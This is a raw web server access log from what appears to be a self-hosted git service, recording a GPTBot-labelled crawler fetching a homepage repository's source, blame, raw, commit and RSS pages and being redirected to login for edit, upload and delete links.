"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" -[17/Feb/2026:15:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images" [Client 74.7.227.38] [Length 10400] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:15:10:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" -[17/Feb/2026:15:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets" -[17/Feb/2026:15:10:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services" -[17/Feb/2026:15:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/services" -[17/Feb/2026:15:10:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components" -[17/Feb/2026:15:10:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" -[17/Feb/2026:15:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/.gitignore" -[17/Feb/2026:15:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" -[17/Feb/2026:15:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" -[17/Feb/2026:15:10:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" -[17/Feb/2026:15:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets" -[17/Feb/2026:15:10:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/components" -[17/Feb/2026:15:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/types.ts" [Client 74.7.227.38] [Length 11029] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" -[17/Feb/2026:15:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 9777] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" -[17/Feb/2026:15:10:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" -[17/Feb/2026:15:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/tsconfig.json" -[17/Feb/2026:15:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 14103] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:10:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" -[17/Feb/2026:15:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/package.json" -[17/Feb/2026:15:10:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" -[17/Feb/2026:15:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/js" -[17/Feb/2026:15:10:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" -[17/Feb/2026:15:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/tsconfig.json" -[17/Feb/2026:15:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 15068] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14448] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:10:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" -[17/Feb/2026:15:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets/js" -[17/Feb/2026:15:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 11455] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" -[17/Feb/2026:15:10:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/types.ts" -[17/Feb/2026:15:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/types.ts" -[17/Feb/2026:15:10:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/types.ts" -[17/Feb/2026:15:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/types.ts" -[17/Feb/2026:15:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" -[17/Feb/2026:15:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" -[17/Feb/2026:15:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 824] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" -[17/Feb/2026:15:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 14016] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" -[17/Feb/2026:15:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" -[17/Feb/2026:15:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" -[17/Feb/2026:15:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" -[17/Feb/2026:15:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" -[17/Feb/2026:15:11:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/vite.config.ts" -[17/Feb/2026:15:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/vite.config.ts" -[17/Feb/2026:15:11:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/vite.config.ts" -[17/Feb/2026:15:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/vite.config.ts" -[17/Feb/2026:15:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" -[17/Feb/2026:15:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9779] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" -[17/Feb/2026:15:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" -[17/Feb/2026:15:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14535] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" -[17/Feb/2026:15:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 15258] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" -[17/Feb/2026:15:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" -[17/Feb/2026:15:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" -[17/Feb/2026:15:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/types.ts" [Client 74.7.227.38] [Length 802] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" -[17/Feb/2026:15:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" -[17/Feb/2026:15:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" -[17/Feb/2026:15:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 17211] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" -[17/Feb/2026:15:11:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" -[17/Feb/2026:15:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/js" -[17/Feb/2026:15:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/types.ts" [Client 74.7.227.38] [Length 9773] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" -[17/Feb/2026:15:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components" [Client 74.7.227.38] [Length 9772] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:11:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" -[17/Feb/2026:15:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/package.json" -[17/Feb/2026:15:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/.gitignore" [Client 74.7.227.38] [Length 9767] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" -[17/Feb/2026:15:11:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:15:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/images" -[17/Feb/2026:15:11:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:15:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets/images" -[17/Feb/2026:15:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/.gitignore" [Client 74.7.227.38] [Length 10988] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" -[17/Feb/2026:15:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr 